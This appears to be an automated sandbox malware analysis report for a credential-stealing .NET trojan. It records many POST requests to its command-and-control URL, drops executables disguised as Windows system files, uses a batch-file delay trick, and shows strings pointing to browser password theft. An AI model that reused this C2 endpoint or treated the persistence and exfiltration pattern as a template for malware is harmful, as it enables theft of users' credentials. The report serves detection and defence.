                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 1868 | Expect: 100-continue | Connection: Keep-Alive
                              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic | DNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: unknown | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 373292cm.nyashka.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: http://373292cm.nyPZ
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: http://373292cm.nyashka.top
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: http://373292cm.nyashka.top/
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: jW5TA1J9Z1.exe | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                              Source: jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Window created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Process Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\DiagTrack\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\DiagTrack\RuntimeBroker.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\DiagTrack\9e8d7a4ca61bd9
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\ServiceProfiles\3b1a2dfabaeac3
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\AppReadiness\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\AppReadiness\RuntimeBroker.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\AppReadiness\9e8d7a4ca61bd9
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\DVfmUYdt.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
Source: jW5TA1J9Z1.exe, 00000000.00000000.1237892460.0000000000812000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 0000001F.00000002.1802396882.00000000031F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003562000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.000000000356D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003616000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003551000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.00000000031AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.00000000031A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.0000000003256000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe, 00000029.00000002.2452868994.0000000003191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
Source: jW5TA1J9Z1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: jW5TA1J9Z1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dwm.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@32/503@2/1
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File created: C:\Users\user\Desktop\vaQeWJTK.log
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NUz87R2ScA5J4vD9Ssui
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File created: C:\Users\user\AppData\Local\Temp\2vh3op5q
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
Source: jW5TA1J9Z1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jW5TA1J9Z1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: dropped files (*.23.dr) Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jW5TA1J9Z1.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File read: C:\Users\user\Desktop\jW5TA1J9Z1.exe
Source: unknown Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"
Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
Source: unknown Process created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
Source: unknown Process created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
Source: unknown Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
Source: unknown Process created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
Source: unknown Process created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
Source: unknown Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
Source: unknown Process created: C:\Windows\DiagTrack\RuntimeBroker.exe "C:\Windows\DiagTrack\RuntimeBroker.exe"
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
Source: unknown Process created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
Source: unknown Process created: C:\Users\user\Desktop\jW5TA1J9Z1.exe "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dllJump to behavior
